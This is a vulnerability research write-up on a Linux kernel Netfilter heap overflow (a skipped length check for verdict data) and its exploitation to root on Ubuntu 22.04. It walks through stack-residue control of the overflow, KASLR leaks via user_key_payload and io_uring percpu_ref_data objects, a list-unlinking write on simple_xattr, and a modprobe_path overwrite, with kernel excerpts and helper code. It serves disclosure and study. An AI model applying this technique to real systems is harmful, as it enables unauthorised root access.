In our previous article, Yet another bug into Netfilter, I presented a vulnerability found within the Netfilter subsystem of the Linux kernel. During that investigation, I came across a weird comparison that does not fully protect a copy into a buffer. It led to a heap buffer overflow, which I exploited to obtain root privileges on Ubuntu 22.04.

A small jump in the past

In the last episode, we reached an out-of-bounds access within the nft_set structure (/include/net/netfilter/nf_tables.h):

```c
struct nft_set {
    struct list_head            list;
    struct list_head            bindings;
    struct nft_table            *table;
    possible_net_t              net;
    char                        *name;
    u64                         handle;
    u32                         ktype;
    u32                         dtype;
    u32                         objtype;
    u32                         size;
    u8                          field_len[NFT_REG32_COUNT];
    u8                          field_count;
    u32                         use;
    atomic_t                    nelems;
    u32                         ndeact;
    u64                         timeout;
    u32                         gc_int;
    u16                         policy;
    u16                         udlen;
    unsigned char               *udata;
    /* runtime data below here */
    const struct nft_set_ops    *ops ____cacheline_aligned;
    u16                         flags:14,
                                genmask:2;
    u8                          klen;
    u8                          dlen;
    u8                          num_exprs;
    struct nft_expr             *exprs[NFT_SET_EXPR_MAX];
    struct list_head            catchall_list;
    unsigned char               data[]
        __attribute__((aligned(__alignof__(u64))));
};
```

As nft_set contains a lot of data, some of its other fields could be used to obtain a better write primitive.

I decided to look around the length fields (udlen, klen and dlen) because they could be helpful to trigger overflows.

Research for Code and Anomalies

While exploring the different accesses to the field dlen, I noticed a call to the memcpy function (1) in nft_set_elem_init (/net/netfilter/nf_tables_api.c) that caught my attention:

```c
void *nft_set_elem_init(const struct nft_set *set,
                        const struct nft_set_ext_tmpl *tmpl,
                        const u32 *key, const u32 *key_end,
                        const u32 *data, u64 timeout, u64 expiration, gfp_t gfp)
{
    struct nft_set_ext *ext;
    void *elem;

    elem = kzalloc(set->ops->elemsize + tmpl->len, gfp);    <===== (0)
    if (elem == NULL)
        return NULL;

    ext = nft_set_elem_ext(set, elem);
    nft_set_ext_init(ext, tmpl);

    if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY))
        memcpy(nft_set_ext_key(ext), key, set->klen);
    if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
        memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
    if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
        memcpy(nft_set_ext_data(ext), data, set->dlen);    <===== (1)
    ...
    return elem;
}
```

This call is suspicious because it involves two different objects.

The destination buffer is stored within an nft_set_ext object, ext, whereas the size of the copy is taken from an nft_set object.

The object ext is dynamically allocated at (0) together with elem, and the size reserved for it is tmpl->len.

I wanted to check whether the value stored in set->dlen is used to compute the value stored in tmpl->len.

The wrong place

nft_set_elem_init is called at (5) within the function nft_add_set_elem (/net/netfilter/nf_tables_api.c), which is responsible for adding an element to a Netfilter set:

```c
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
                            const struct nlattr *attr, u32 nlmsg_flags)
{
    struct nlattr *nla[NFTA_SET_ELEM_MAX + 1];
    struct nft_set_ext_tmpl tmpl;
    struct nft_set_elem elem;    <===== (2)
    struct nft_data_desc desc;
    ...
    if (nla[NFTA_SET_ELEM_DATA] != NULL) {
        err = nft_setelem_parse_data(ctx, set, &desc, &elem.data.val,    <===== (3)
                                     nla[NFTA_SET_ELEM_DATA]);
        if (err < 0)
            goto err_parse_key_end;
        ...
        nft_set_ext_add_length(&tmpl, NFT_SET_EXT_DATA, desc.len);    <===== (4)
    }
    ...
    err = -ENOMEM;
    elem.priv = nft_set_elem_init(set, &tmpl, elem.key.val.data,    <===== (5)
                                  elem.key_end.val.data, elem.data.val.data,
                                  timeout, expiration, GFP_KERNEL);
    if (elem.priv == NULL)
        goto err_parse_data;
    ...
```

As you can observe, set->dlen is not used to reserve the space for the data associated with the id NFT_SET_EXT_DATA; desc.len is used instead (4).

desc is initialized within the function nft_setelem_parse_data (/net/netfilter/nf_tables_api.c), called at (3):

```c
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
                                  struct nft_data_desc *desc,
                                  struct nft_data *data,
                                  struct nlattr *attr)
{
    int err;

    err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr);    <===== (6)
    if (err < 0)
        return err;

    if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) {    <===== (7)
        nft_data_release(data, desc->type);
        return -EINVAL;
    }

    return 0;
}
```

First of all, data and desc are filled in nft_data_init (/net/netfilter/nf_tables_api.c) according to the data provided by the user (6).

The critical part is the check between desc->len and set->dlen at (7): it only occurs when the data associated with the added element has a type different from NFT_DATA_VERDICT.

However, set->dlen is controlled by the user when a new set is created.

The only restrictions are that set->dlen must not exceed 64 bytes and that the data type of the set must be different from NFT_DATA_VERDICT.

Moreover, when desc->type is equal to NFT_DATA_VERDICT, desc->len is equal to 16 bytes.

Consequently, adding an element with NFT_DATA_VERDICT data to a set whose data type is NFT_DATA_VALUE usually leads to desc->len being different from set->dlen, and the check at (7) does not catch it. Whenever set->dlen is greater than 16, more bytes are copied at (1) than were reserved at (4).

Therefore, it is possible to trigger a heap buffer overflow in nft_set_elem_init at (1).

This buffer overflow can be up to 48 bytes long (64 - 16 bytes).
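To make the flaw concrete, here is a small user-space model of the check at (7) and of the copy at (1). It is a sketch, not kernel code: the enum values are placeholders rather than the real uapi constants, the 16-byte verdict length assumes x86_64, and the model_* names are hypothetical. It only counts bytes copied beyond the region reserved at (4); whether they also leave the heap object depends on the layout of elem.

```c
#include <assert.h>
#include <stdbool.h>

/* Placeholder type tags; the real enum nft_data_types values differ. */
enum model_data_type { MODEL_DATA_VALUE, MODEL_DATA_VERDICT };

#define MODEL_VALUE_MAXLEN 64u /* NFT_DATA_VALUE_MAXLEN */
#define MODEL_VERDICT_LEN  16u /* desc->len of a verdict on x86_64 */

/* Mirrors the condition at (7): true means the element is accepted. */
static bool model_parse_data_ok(enum model_data_type type,
                                unsigned int desc_len, unsigned int set_dlen)
{
    /* The length comparison is skipped entirely for verdicts. */
    if (type != MODEL_DATA_VERDICT && desc_len != set_dlen)
        return false;
    return true;
}

/* Bytes copied by the memcpy() at (1) beyond the desc_len bytes
 * reserved at (4). */
static unsigned int model_overflow_len(unsigned int desc_len,
                                       unsigned int set_dlen)
{
    assert(set_dlen <= MODEL_VALUE_MAXLEN); /* enforced at set creation */
    return set_dlen > desc_len ? set_dlen - desc_len : 0;
}
```

For example, a verdict element (desc.len = 16) added to a set created with dlen = 64 passes the check and yields the maximal 48-byte overflow, whereas a value element of 16 bytes is rejected for the same set.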

Stay here! I will be back soon!

Nevertheless, this is not a standard buffer overflow, in which the user directly controls the overflowing data. In this case, uncontrolled data is copied past the end of the allocated buffer.

If we look at the call to nft_set_elem_init (5), we can observe that the copied data comes from the local variable elem, which is an nft_set_elem object:

```c
struct nft_set_elem elem;    <===== (2)
...
elem.priv = nft_set_elem_init(set, &tmpl, elem.key.val.data,    <===== (5)
                              elem.key_end.val.data, elem.data.val.data,
                              timeout, expiration, GFP_KERNEL);
```

nft_set_elem objects (/include/net/netfilter/nf_tables.h) are used to store information about new elements during their creation:

```c
#define NFT_DATA_VALUE_MAXLEN 64

struct nft_verdict {
    u32 code;
    struct nft_chain *chain;
};

struct nft_data {
    union {
        u32 data[4];
        struct nft_verdict verdict;
    };
} __attribute__((aligned(__alignof__(u64))));

struct nft_set_elem {
    union {
        u32 buf[NFT_DATA_VALUE_MAXLEN / sizeof(u32)];
        struct nft_data val;
    } key;
    union {
        u32 buf[NFT_DATA_VALUE_MAXLEN / sizeof(u32)];
        struct nft_data val;
    } key_end;
    union {
        u32 buf[NFT_DATA_VALUE_MAXLEN / sizeof(u32)];
        struct nft_data val;
    } data;
    void *priv;
};
```

As one can see, 64 bytes are reserved to temporarily store the data associated with the new element.

However, at most 16 bytes are written into elem.data when the buffer overflow is triggered, since the data is then a verdict.

Therefore, the remaining bytes used in the overflow are whatever happens to be left in elem.data on the stack.
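The 64/16 split can be checked with a user-space replica of these structures. This sketch assumes an LP64 target such as x86_64 and GCC or Clang (for the alignment attribute); kernel types are replaced by their <stdint.h> equivalents, and stale_bytes_in_data is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define NFT_DATA_VALUE_MAXLEN 64

struct nft_chain; /* opaque, only used through a pointer */

struct nft_verdict {
    uint32_t code;
    struct nft_chain *chain; /* 4 bytes of padding precede it on LP64 */
};

struct nft_data {
    union {
        uint32_t data[4];
        struct nft_verdict verdict;
    };
} __attribute__((aligned(__alignof__(uint64_t))));

struct nft_set_elem {
    union { uint32_t buf[NFT_DATA_VALUE_MAXLEN / sizeof(uint32_t)]; struct nft_data val; } key;
    union { uint32_t buf[NFT_DATA_VALUE_MAXLEN / sizeof(uint32_t)]; struct nft_data val; } key_end;
    union { uint32_t buf[NFT_DATA_VALUE_MAXLEN / sizeof(uint32_t)]; struct nft_data val; } data;
    void *priv;
};

/* A verdict only fills sizeof(struct nft_verdict) bytes of elem.data;
 * the rest of the 64-byte buffer keeps whatever was on the stack. */
static size_t stale_bytes_in_data(void)
{
    return sizeof(((struct nft_set_elem *)0)->data) - sizeof(struct nft_verdict);
}
```

On x86_64 this gives a 16-byte verdict, elem.data at offset 128 of a 200-byte structure, and 48 stale bytes.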

Finally, not so random

At this point, I had found a buffer overflow without control over the data used for the corruption. Building an exploit with an uncontrolled buffer overflow is a real challenge.

However, elem.data, which is used in the overflow, is not initialized (2).

This could be leveraged to control the overflow.

Let's have a look at the caller: maybe the previously called function can help to control the data used for the overflow.

nft_add_set_elem is called in nf_tables_newsetelem (/net/netfilter/nf_tables_api.c) for each element that the user wants to add to the set:

```c
static int nf_tables_newsetelem(struct sk_buff *skb,
                                const struct nfnl_info *info,
                                const struct nlattr * const nla[])
{
    ...
    nla_for_each_nested(attr, nla[NFTA_SET_ELEM_LIST_ELEMENTS], rem) {
        err = nft_add_set_elem(&ctx, set, attr, info->nlh->nlmsg_flags);
        if (err < 0) {
            NL_SET_BAD_ATTR(extack, attr);
            return err;
        }
    }
}
```

nla_for_each_nested is used to iterate over the attributes sent by the user, so the user controls the number of iterations.

Moreover, nla_for_each_nested only relies on macros and inline functions, so a call to nft_add_set_elem can be directly followed by another call to nft_add_set_elem, with no other function call in between that could overwrite the stack.

This is very useful: since elem.data is not initialized, the second call finds in its stack frame the data left by the previous element, which can then be used in the overflow.

Moreover, the randomization of the stack layout can be ignored, since both calls to the same function place elem at the same location.

Therefore, the way to control the overflow is independent of how the kernel was compiled.
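To illustrate why the number of iterations is in the user's hands, the following sketch re-implements the walk performed by nla_for_each_nested over a buffer of netlink attributes. The model_* names are hypothetical replicas of struct nlattr, NLA_ALIGN and the nla_ok() bounds check from the kernel headers; nothing here talks to the kernel.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Replica of struct nlattr: nla_len covers header + payload,
 * attributes are padded to 4 bytes. */
struct model_nlattr {
    uint16_t nla_len;
    uint16_t nla_type;
};

#define MODEL_NLA_ALIGN(len) (((size_t)(len) + 3) & ~(size_t)3)
#define MODEL_NLA_HDRLEN MODEL_NLA_ALIGN(sizeof(struct model_nlattr))

/* Append one attribute with `len` payload bytes at `off`; returns the
 * offset of the next attribute. The caller provides a large enough buffer. */
static size_t model_put_attr(uint8_t *buf, size_t off, uint16_t type,
                             const void *payload, uint16_t len)
{
    struct model_nlattr hdr = {
        .nla_len = (uint16_t)(MODEL_NLA_HDRLEN + len),
        .nla_type = type,
    };
    memcpy(buf + off, &hdr, sizeof(hdr));
    memcpy(buf + off + MODEL_NLA_HDRLEN, payload, len);
    return off + MODEL_NLA_ALIGN(hdr.nla_len);
}

/* Walk the buffer like nla_for_each_nested(): one iteration per attribute
 * that passes the nla_ok()-style bounds check. In nf_tables_newsetelem(),
 * each iteration is one call to nft_add_set_elem(). */
static int model_count_nested(const uint8_t *buf, size_t total)
{
    int iterations = 0;
    size_t off = 0;

    while (off + sizeof(struct model_nlattr) <= total) {
        struct model_nlattr hdr;
        memcpy(&hdr, buf + off, sizeof(hdr));
        if (hdr.nla_len < sizeof(hdr) || hdr.nla_len > total - off)
            break;
        iterations++;
        off += MODEL_NLA_ALIGN(hdr.nla_len);
    }
    return iterations;
}
```

Sending three element attributes yields three back-to-back calls; a truncated last attribute simply ends the loop.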



The schema above summarizes the different stages of elem.data within the stack that produce a controlled overflow.

Initially, the stack contains random data. Adding a new element with NFT_DATA_VALUE data leaves user-controlled data on the stack.

Finally, adding a second element with NFT_DATA_VERDICT data triggers the buffer overflow, and the residual data of the previous element is copied during the overflow.
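The two stages can be simulated in user space. In this sketch, a static buffer stands in for the stack slot of elem.data, on the assumption (argued above) that two consecutive nft_add_set_elem calls place elem at the same address; add_value_elem and add_verdict_elem are hypothetical names that only mimic the copies involved.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DATA_MAX    64 /* NFT_DATA_VALUE_MAXLEN */
#define VERDICT_LEN 16 /* sizeof(struct nft_verdict) on x86_64 */

/* Stands in for elem.data; like the uninitialized local, it is never
 * cleared between two "calls". */
static uint8_t elem_data_slot[DATA_MAX];

/* Stage 1: an element with NFT_DATA_VALUE data writes set->dlen user bytes. */
static void add_value_elem(const uint8_t *user, size_t dlen)
{
    assert(dlen <= DATA_MAX);
    memcpy(elem_data_slot, user, dlen);
}

/* Stage 2: an NFT_DATA_VERDICT element only fills the first 16 bytes, but
 * set->dlen bytes are copied out, as the memcpy() at (1) does. `out` stands
 * in for the destination of that copy. */
static void add_verdict_elem(const uint8_t verdict[VERDICT_LEN],
                             uint8_t *out, size_t dlen)
{
    assert(dlen <= DATA_MAX);
    memcpy(elem_data_slot, verdict, VERDICT_LEN);
    memcpy(out, elem_data_slot, dlen);
}
```

After a 64-byte value element filled with 0x41, a verdict element copies out 16 verdict bytes followed by 48 bytes of 0x41: the tail of the overflow is the residue of the first element.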

Cache selection

The last point to discuss before developing my exploitation strategy is the cache in which the overflow happens.

The size of elem, allocated at (0), depends on the options selected by the user: as shown in the previous extract of the function nft_add_set_elem, it may vary.

Several options can be used to increase it, such as NFTA_SET_ELEM_KEY and NFTA_SET_ELEM_KEY_END.

They allow reserving two buffers of up to 64 bytes each in elem.

So this overflow can clearly happen in several caches.

On Ubuntu 22.04, elem is allocated with the flag GFP_KERNEL, without __GFP_ACCOUNT, so it lands in the generic kmalloc caches rather than in the kmalloc-cg ones.

Therefore, the concerned caches are kmalloc-{64,96,128,192}.
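A quick way to see which generic cache serves a given elem size is to round the size up to the next kmalloc size class. The class list below is an assumption matching a default x86_64 SLUB configuration, and kmalloc_cache_for is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>

/* Generic kmalloc-<n> size classes (assumed default x86_64 SLUB setup);
 * larger requests bypass the slab caches. */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the kmalloc-<n> cache that serves an allocation of `size` bytes,
 * or 0 when the request is too large for the generic caches. */
static size_t kmalloc_cache_for(size_t size)
{
    for (size_t i = 0; i < sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]); i++)
        if (size <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    return 0;
}
```

For instance, an elem of exactly 64 bytes lands in kmalloc-64, while 65 bytes already moves it to kmalloc-96.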

Now, the only thing that remains is to make the size of elem match the object size of the target cache, so that the overflow starts exactly at the beginning of the next object.



The schema above represents the construction of elem to align it on 64 bytes.

We used the following construction in order to target the kmalloc-64 cache:

- 20 bytes for the object header
- 28 bytes of padding via NFTA_SET_ELEM_KEY
- 16 bytes to store the element data of type NFT_DATA_VERDICT
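The arithmetic behind this layout is sketched below, assuming (as the list suggests) that the data area sits right after the key padding at the end of the object. With set->dlen = 64, the memcpy at (1) starts writing at offset 48 and therefore spills 48 bytes into the next kmalloc-64 object. The macro and function names are hypothetical.

```c
#include <assert.h>

#define OBJ_SIZE    64u /* kmalloc-64 object size */
#define HEADER_LEN  20u /* object header */
#define KEY_PAD_LEN 28u /* padding obtained through NFTA_SET_ELEM_KEY */
#define VERDICT_LEN 16u /* NFT_SET_EXT_DATA area, reserved with desc.len */

/* Assumed offset of the data area inside elem: header, then key padding. */
static unsigned int data_offset(void)
{
    return HEADER_LEN + KEY_PAD_LEN;
}

/* Bytes written past the end of the kmalloc-64 object when the memcpy()
 * at (1) copies set->dlen bytes into the data area. */
static unsigned int bytes_into_next_object(unsigned int set_dlen)
{
    unsigned int end = data_offset() + set_dlen;

    assert(set_dlen <= 64); /* NFT_DATA_VALUE_MAXLEN */
    return end > OBJ_SIZE ? end - OBJ_SIZE : 0;
}
```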

Gimme a leak

Now that it is possible to control the overflowing data, the next step is to find a way to retrieve the KASLR base.

As the overflow only occurs in kmalloc-x caches, the classical msg_msg objects cannot be used to perform an information leak, because they are allocated within the kmalloc-cg-x caches.

We looked at user_key_payload objects (/include/keys/user-type.h), which are normally used to store sensitive user information in kernel land; they represent a good alternative.

They are similar to msg_msg objects in their structure: a header with the object size, then a buffer with user data.

```c
struct user_key_payload {
    struct rcu_head rcu;        /* RCU destructor */
    unsigned short  datalen;    /* length of this data */
    char            data[] __aligned(__alignof__(u64)); /* actual data */
};
```

These objects are allocated within the function user_preparse (/security/keys/user_defined.c):

```c
int user_preparse(struct key_preparsed_payload *prep)
{
    struct user_key_payload *upayload;
    size_t datalen = prep->datalen;

    if (datalen <= 0 || datalen > 32767 || !prep->data)
        return -EINVAL;

    upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);    <===== (6)
    if (!upayload)
        return -ENOMEM;

    /* attach the data */
    prep->quotalen = datalen;
    prep->payload.data[0] = upayload;
    upayload->datalen = datalen;
    memcpy(upayload->data, prep->data, datalen);    <===== (7)
    return 0;
}
```

The allocation done at (6) takes into account the length of the data provided by the user.

Then, the data is stored just after the header by the call to memcpy at (7).

The header of user_key_payload objects is 24 bytes long; consequently, they can be used to spray several caches, from kmalloc-32 to kmalloc-8k.
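The 24-byte header and the resulting cache can be checked with a user-space replica of struct user_key_payload. This sketch assumes x86_64, where struct rcu_head consists of two pointers, and a default SLUB set of generic kmalloc sizes; the model_* names and key_payload_cache are hypothetical. Under these assumptions, payloads of 9 to 40 bytes land in kmalloc-64, the cache targeted here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* struct rcu_head (alias of struct callback_head): two pointers. */
struct model_rcu_head {
    struct model_rcu_head *next;
    void (*func)(struct model_rcu_head *head);
};

struct model_user_key_payload {
    struct model_rcu_head rcu;
    unsigned short datalen;
    char data[] __attribute__((aligned(__alignof__(uint64_t))));
};

/* Generic kmalloc cache that receives the allocation at (6) for a payload
 * of `datalen` bytes, or 0 when it exceeds kmalloc-8k. */
static size_t key_payload_cache(size_t datalen)
{
    static const size_t sizes[] = { 8, 16, 32, 64, 96, 128, 192, 256,
                                    512, 1024, 2048, 4096, 8192 };
    size_t total = sizeof(struct model_user_key_payload) + datalen;

    assert(datalen > 0 && datalen <= 32767); /* same bounds as user_preparse() */
    for (size_t i = 0; i < sizeof(sizes) / sizeof(sizes[0]); i++)
        if (total <= sizes[i])
            return sizes[i];
    return 0;
}
```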

As with msg_msg objects, the goal is to overwrite the field datalen with a bigger value than the initial one.

When retrieving the information stored, the corrupted object will return more data than initially provided by the user.

However, there is an important drawback with this spray.

The number of allocated objects is restricted.

The sysctl variable kernel.keys.maxkeys defines the maximum number of keys that a non-root user may own.

Moreover, kernel.keys.maxbytes limits the number of bytes of payload data that such a user may hold in these keys.

The default values of these variables are very low.

They are shown below for Ubuntu 22.04:

```
kernel.keys.maxbytes = 20000
kernel.keys.maxkeys = 200
```
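These limits bound the size of the spray. The sketch below estimates how many keys a non-root user can create, under a simplified accounting model (an assumption): each key costs its payload length plus its description length plus one byte against maxbytes, and keys the user already holds are ignored. max_sprayable_keys is a hypothetical helper. With 40-byte payloads for kmalloc-64, maxkeys is the binding limit, so at most about 200 objects can be sprayed.

```c
#include <assert.h>
#include <stddef.h>

/* Rough upper bound on the number of user keys a non-root user can create
 * given the two quotas, under the simplified per-key cost described above. */
static size_t max_sprayable_keys(size_t maxkeys, size_t maxbytes,
                                 size_t datalen, size_t desclen)
{
    size_t per_key = datalen + desclen + 1;
    size_t by_bytes;

    assert(datalen > 0); /* user_preparse() rejects empty payloads */
    by_bytes = maxbytes / per_key;
    return by_bytes < maxkeys ? by_bytes : maxkeys;
}
```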

Leaking is good, leaking useful is better

Now that there is a way to leak information, the next step is to find interesting information to leak.

Working within the kmalloc-64 cache seemed the best option: it is the cache with the smallest objects in which the overflow can occur.

Consequently, a given leak covers a higher number of objects.

percpu_ref_data (/include/linux/percpu-refcount.h) objects are also allocated in this cache.

They are interesting targets because they contain two useful kinds of pointers:

```c
struct percpu_ref_data {
    atomic_long_t       count;
    percpu_ref_func_t   *release;
    percpu_ref_func_t   *confirm_switch;
    bool                force_atomic:1;
    bool                allow_reinit:1;
    struct rcu_head     rcu;
    struct percpu_ref   *ref;
};
```

These objects store function pointers (fields release and confirm_switch) which, once leaked, can be used to compute the KASLR base or module bases, as well as a pointer to a dynamically allocated object (field ref), which is useful to compute the physmap base.
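Once the corrupted key returns more data than it should, the leaked bytes have to be searched for such an object. The sketch below scans leaked 8-byte words for the shape of a freshly initialized percpu_ref_data: a function pointer in release, a NULL confirm_switch, and a heap pointer in ref. The field offsets follow the structure above on x86_64; the address ranges used to classify pointers are heuristic assumptions, and the function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Word offsets of struct percpu_ref_data on x86_64:
 * count@0, release@1, confirm_switch@2, flag bits@3, rcu@4-5, ref@6. */
enum { PRD_RELEASE = 1, PRD_CONFIRM = 2, PRD_REF = 6, PRD_WORDS = 7 };

/* Heuristic bounds: kernel text (and modules) sit at or above
 * 0xffffffff80000000, heap pointers are kernel addresses below it. */
static int is_text_ptr(uint64_t v) { return v >= 0xffffffff80000000ull; }
static int is_heap_ptr(uint64_t v)
{
    return v >= 0xffff800000000000ull && v < 0xffffffff80000000ull;
}

/* Return the word index where a percpu_ref_data-like object starts in the
 * leaked buffer, or -1 if none is found. */
static long find_percpu_ref_data(const uint64_t *leak, size_t nwords)
{
    assert(leak != NULL || nwords == 0);
    for (size_t i = 0; i + PRD_WORDS <= nwords; i++) {
        if (is_text_ptr(leak[i + PRD_RELEASE]) &&
            leak[i + PRD_CONFIRM] == 0 &&
            is_heap_ptr(leak[i + PRD_REF]))
            return (long)i;
    }
    return -1;
}
```

The word found at PRD_RELEASE gives the function address used for the KASLR base, and the one at PRD_REF gives the heap pointer used for the physmap base.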

Such objects are allocated during a call to percpu_ref_init (/lib/percpu-refcount.c).

```c
int percpu_ref_init(struct percpu_ref *ref, percpu_ref_func_t *release,
                    unsigned int flags, gfp_t gfp)
{
    struct percpu_ref_data *data;
    ...
    data = kzalloc(sizeof(*ref->data), gfp);
    ...
    data->release = release;
    data->confirm_switch = NULL;
    data->ref = ref;
    ref->data = data;
    return 0;
}
```

The simplest way to allocate percpu_ref_data objects is to use the io_uring_setup syscall (/fs/io_uring.c).

To trigger the release of such an object, a simple call to the close syscall on the returned file descriptor is enough.
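A minimal sketch of this allocate-then-release pattern, using the raw syscall since glibc provides no io_uring_setup wrapper. spray_io_uring and release_io_uring are hypothetical names; the syscall number fallback is the x86_64 value, and the spray simply stops early if io_uring is unavailable (for example when a seccomp policy blocks it). Closing a ring only schedules its teardown, so the release is asynchronous.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <linux/io_uring.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef __NR_io_uring_setup
#define __NR_io_uring_setup 425 /* x86_64 value */
#endif

/* Each successful io_uring_setup() allocates an io_ring_ctx and, through
 * percpu_ref_init(), a percpu_ref_data object. Returns how many rings were
 * created; fds[] receives their file descriptors. */
static int spray_io_uring(int *fds, int count, unsigned int entries)
{
    int n = 0;

    assert(fds != NULL || count == 0);
    for (; n < count; n++) {
        struct io_uring_params params;
        memset(&params, 0, sizeof(params));
        long fd = syscall(__NR_io_uring_setup, entries, &params);
        if (fd < 0)
            break;
        fds[n] = (int)fd;
    }
    return n;
}

/* Closing a ring fd schedules the release of the associated objects. */
static void release_io_uring(const int *fds, int count)
{
    for (int i = 0; i < count; i++)
        close(fds[i]);
}
```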

The allocation of a percpu_ref_data object is done during the initialization of an io_ring_ctx object (/fs/io_uring.c) within the function io_ring_ctx_alloc (/fs/io_uring.c).

```c
static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
{
    struct io_ring_ctx *ctx;
    ...
    if (percpu_ref_init(&ctx->refs, io_ring_ctx_ref_free,
                        PERCPU_REF_ALLOW_REINIT, GFP_KERNEL))
        goto err;
    ...
}
```

As io_uring is built into the core kernel (it cannot be built as a module), leaking the address of io_ring_ctx_ref_free (/fs/io_uring.c) allows computing the KASLR base.
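The computation itself is a subtraction. In the sketch below, IO_RING_CTX_REF_FREE_OFF is a placeholder: the real offset of io_ring_ctx_ref_free from the kernel base depends on the exact Ubuntu kernel build and has to be taken from its symbols. The 2 MiB alignment check assumes the default x86_64 CONFIG_PHYSICAL_ALIGN, and kaslr_base_from_leak is a hypothetical helper.

```c
#include <assert.h>
#include <stdint.h>

/* Placeholder offset of io_ring_ctx_ref_free from the kernel base. */
#define IO_RING_CTX_REF_FREE_OFF 0x5d1230ull

/* Default alignment of the randomized kernel base on x86_64 (2 MiB). */
#define KERNEL_ALIGN 0x200000ull

/* Turn a leaked function pointer into the kernel base; returns 0 when the
 * result is misaligned, i.e. the offset does not match this build or the
 * leaked word was not the expected function. */
static uint64_t kaslr_base_from_leak(uint64_t leaked_ptr, uint64_t sym_off)
{
    uint64_t base;

    assert(leaked_ptr >= sym_off);
    base = leaked_ptr - sym_off;
    return (base % KERNEL_ALIGN) == 0 ? base : 0;
}
```

The same helper works for any other leaked core-kernel function pointer, given its offset.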

During my investigation, some unexpected percpu_ref_data objects showed up in the leak, with the address of the function io_rsrc_node_ref_zero (/fs/io_uring.c) in the field release.

After analyzing the origin of these objects, I understood that they also come from the io_uring_setup syscall.

This beneficial side effect of the io_uring_setup syscall improved the leak within my exploit.

I am (G)root

Now that a useful information leak is possible, a good write primitive is needed to perform a privilege escalation.

A few weeks ago, Lam Jun Rong from Starlabs released an article that describes a new way to exploit CVE-2021-41073.

He presents a new write primitive, the unlinking attack.

It is based on the list_del operation.

After a list_head object is corrupted with two addresses, unlinking it writes each address at the location pointed to by the other.
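The primitive can be reproduced in user space with the same unlinking code the kernel uses, minus the CONFIG_DEBUG_LIST sanity checks and the poisoning of the removed entry. model_list_del is a hypothetical name. If entry->next and entry->prev are attacker-chosen addresses A and B, unlinking writes B into A->prev and A into B->next, so both locations must be mapped and writable.

```c
#include <assert.h>
#include <stddef.h>

/* Same layout as the kernel's struct list_head. */
struct list_head {
    struct list_head *next, *prev;
};

/* Equivalent of __list_del_entry() without integrity checks. */
static void model_list_del(struct list_head *entry)
{
    struct list_head *next = entry->next, *prev = entry->prev;

    assert(next != NULL && prev != NULL);
    next->prev = prev; /* writes entry->prev at offset 8 of *entry->next */
    prev->next = next; /* writes entry->next at offset 0 of *entry->prev */
}
```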

As in L.J. Rong's article, the target for the list_head corruption in my exploit is a simple_xattr object:

```c
struct simple_xattr {
    struct list_head list;
    char *name;
    size_t size;
    char value[];
};
```



To work, this technique requires knowing which object has been corrupted. Otherwise, removing random items from the list would surely lead to a fault during the list traversal. The items in the list are identified by their names.

To identify the corrupted object, I use a trick on the name field: by allocating name with a length large enough to have 256 bytes reserved, the least significant byte of the returned address is null.

On little-endian architectures, such as x86_64, this allows the overflow to overwrite just the least significant byte of name, right after the two pointers of the list_head.

Consequently, it is possible to prepare the list field for the write primitive and, at the same time, identify the corrupted object by truncating its name.

The only requirement is that all the names share the same ending.
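One way to read this trick, sketched as a user-space simulation: each name lives in a 256-byte, 256-aligned buffer (standing in for a kmalloc-256 object), so the low byte of its address is 0x00, and every name ends with the same suffix at a fixed offset. Overwriting only that low byte with the suffix offset moves the pointer onto the common suffix, so the corrupted object answers to that shared name. SUFFIX_OFF, make_name and overwrite_low_byte are hypothetical, and the byte overwrite relies on a little-endian target such as x86_64.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_SLOT  256 /* stands in for a kmalloc-256 object */
#define SUFFIX_OFF 200 /* hypothetical offset of the common suffix */

/* Build "<unique prefix>AAAA...<common suffix>" in a 256-aligned buffer. */
static char *make_name(int id, const char *suffix)
{
    char prefix[32];
    int len = snprintf(prefix, sizeof(prefix), "id%d.", id);
    char *name = aligned_alloc(NAME_SLOT, NAME_SLOT);

    if (name == NULL || len < 0 || strlen(suffix) >= NAME_SLOT - SUFFIX_OFF) {
        free(name);
        return NULL;
    }
    memset(name, 'A', SUFFIX_OFF);       /* filler up to the suffix */
    memcpy(name, prefix, (size_t)len);   /* unique part, no terminator */
    strcpy(name + SUFFIX_OFF, suffix);   /* shared ending + '\0' */
    return name;
}

/* Overwrite the first byte of the pointer's in-memory representation,
 * which is its least significant byte on little-endian x86_64. */
static const char *overwrite_low_byte(const char *ptr, uint8_t byte)
{
    memcpy(&ptr, &byte, 1);
    return ptr;
}
```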

The following schema summarizes the construction of the name for a spray with simple_xattr objects.

Using this write primitive, it is possible to overwrite modprobe_path with a path in the /tmp/ folder.

This allows running an arbitrary program with root privileges, and enjoying a root shell!

Remarks

This exploitation method relies on the hypothesis that a specific address is mapped in kernel land, which is not always the case. So the exploit is not fully reliable, but it still has a good success rate. The second drawback of the unlinking attack is the kernel panic that occurs when the exploit finishes. This could be avoided by finding objects that can stay in kernel memory at the end of the exploit process.

The end of the story

